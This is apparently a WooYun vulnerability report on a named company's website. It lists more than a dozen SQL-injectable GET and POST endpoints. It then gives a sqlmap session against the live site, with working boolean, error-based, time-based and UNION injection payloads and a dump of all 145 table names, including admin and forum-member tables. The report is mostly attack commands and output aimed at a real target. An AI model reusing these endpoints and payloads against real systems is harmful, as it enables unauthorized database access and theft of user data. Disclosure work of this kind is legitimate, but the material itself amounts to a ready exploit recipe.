WooYun.org

get注入：
/down.php?id=1
/productDetail.php?Class_ID=1
/productsTypeDetail.php?id=1
showNews.php?Class_ID=6&News_ID=13
/zhishi_sub.php?id=6/
/network.php?page=%5c&submit=GO
/news.php?page=%5c 
/productDetail.php?Class_ID=1'%
productsList.php?Class_ID=3&page=%5c
productsTypeDetail.php?id=1
question.php?page=%
/showNews.php?Class_ID=6
/zhishi_sub.php?id=1

post注入：
DownAD.php
/down_soft.php

D:\Program Files (x86)\python\sqlmap>sqlmap.py -u "http://www.bbktel.com.cn/Down
_AD.php?id=11" --tables -D "bbk_tel"
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150712}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 13:13:01
[13:13:01] [INFO] resuming back-end DBMS 'mysql'
[13:13:01] [INFO] testing connection to the target URL
[13:13:01] [INFO] heuristics detected web page charset 'GB2312'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11 AND 6802=6802
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (EXTRACTVALUE)
    Payload: id=11 AND EXTRACTVALUE(5350,CONCAT(0x5c,0x71717a7871,(SELECT (ELT(5
350=5350,1))),0x716a716a71))
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=11 OR SLEEP(5)
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: id=-7403 UNION ALL SELECT NULL,CONCAT(0x71717a7871,0x554e4167686942
55654e,0x716a716a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[13:13:01] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.1
[13:13:01] [INFO] fetching tables for database: 'bbk_tel'
[13:13:01] [INFO] the SQL query used returns 145 entries
Database: bbk_tel
[145 tables]
+----------------------------+
| bbk_acting                 |
| bbk_actingpower            |
| bbk_actingscore            |
| bbk_guest                  |
| bbk_tel_actives_tab        |
| bbk_tel_admin_tab          |
| bbk_tel_down_ad            |
| bbk_tel_down_backwall      |
| bbk_tel_down_screen        |
| bbk_tel_guestbook          |
| bbk_tel_huodong_tab        |
| bbk_tel_index_pic          |
| bbk_tel_network_tab        |
| bbk_tel_news_tab           |
| bbk_tel_news_type          |
| bbk_tel_notice             |
| bbk_tel_pingmian_class     |
| bbk_tel_pingmian_tab       |
| bbk_tel_pro_shuoming       |
| bbk_tel_pro_shuoming_class |
| bbk_tel_pro_shuoming_tab   |
| bbk_tel_pro_sms            |
| bbk_tel_pro_soft           |
| bbk_tel_product_discuss    |
| bbk_tel_product_discuss_ty |
| bbk_tel_product_picture    |
| bbk_tel_product_tab        |
| bbk_tel_product_type       |
| bbk_tel_sold_question      |
| bbk_tel_sold_zhishi        |
| bbk_tel_survey             |
| bbk_tel_surveyprize        |
| bbk_tel_system_tab         |
| bbk_tel_vote               |
| bbk_tel_votelog            |
| bbk_tel_voteoptions        |
| bbk_tel_year               |
| bbk_tel_year_book          |
| cdb_access                 |
| cdb_activities             |
| cdb_activityapplies        |
| cdb_addons                 |
| cdb_adminactions           |
| cdb_admincustom            |
| cdb_admingroups            |
| cdb_adminnotes             |
| cdb_adminsessions          |
| cdb_advertisements         |
| cdb_announcements          |
| cdb_attachmentfields       |
| cdb_attachments            |
| cdb_attachpaymentlog       |
| cdb_attachtypes            |
| cdb_banned                 |
| cdb_bbcodes                |
| cdb_caches                 |
| cdb_creditslog             |
| cdb_crons                  |
| cdb_debateposts            |
| cdb_debates                |
| cdb_failedlogins           |
| cdb_faqs                   |
| cdb_favoriteforums         |
| cdb_favorites              |
| cdb_favoritethreads        |
| cdb_feeds                  |
| cdb_forumfields            |
| cdb_forumlinks             |
| cdb_forumrecommend         |
| cdb_forums                 |
| cdb_imagetypes             |
| cdb_invites                |
| cdb_itempool               |
| cdb_magiclog               |
| cdb_magicmarket            |
| cdb_magics                 |
| cdb_medallog               |
| cdb_medals                 |
| cdb_memberfields           |
| cdb_membermagics           |
| cdb_memberrecommend        |
| cdb_members                |
| cdb_memberspaces           |
| cdb_moderators             |
| cdb_modworks               |
| cdb_myposts                |
| cdb_mytasks                |
| cdb_mythreads              |
| cdb_navs                   |
| cdb_onlinelist             |
| cdb_onlinetime             |
| cdb_orders                 |
| cdb_paymentlog             |
| cdb_pluginhooks            |
| cdb_plugins                |
| cdb_pluginvars             |
| cdb_polloptions            |
| cdb_polls                  |
| cdb_postposition           |
| cdb_posts                  |
| cdb_profilefields          |
| cdb_projects               |
| cdb_promotions             |
| cdb_prompt                 |
| cdb_promptmsgs             |
| cdb_prompttype             |
| cdb_ranks                  |
| cdb_ratelog                |
| cdb_regips                 |
| cdb_relatedthreads         |
| cdb_reportlog              |
| cdb_request                |
| cdb_rewardlog              |
| cdb_rsscaches              |
| cdb_searchindex            |
| cdb_sessions               |
| cdb_settings               |
| cdb_smilies                |
| cdb_spacecaches            |
| cdb_stats                  |
| cdb_statvars               |
| cdb_styles                 |
| cdb_stylevars              |
| cdb_tags                   |
| cdb_tasks                  |
| cdb_taskvars               |
| cdb_templates              |
| cdb_threads                |
| cdb_threadsmod             |
| cdb_threadtags             |
| cdb_threadtypes            |
| cdb_tradecomments          |
| cdb_tradelog               |
| cdb_tradeoptionvars        |
| cdb_trades                 |
| cdb_typemodels             |
| cdb_typeoptions            |
| cdb_typeoptionvars         |
| cdb_typevars               |
| cdb_usergroups             |
| cdb_validating             |
| cdb_warnings               |
| cdb_words                  |
| cdb_xreports               |
| notice                     |
+----------------------------+
[13:13:01] [INFO] fetched data logged to text files under 'C:\Users\air\.sqlmap\
output\www.bbktel.com.cn'
[*] shutting down at 13:13:01
D:\Program Files (x86)\python\sqlmap>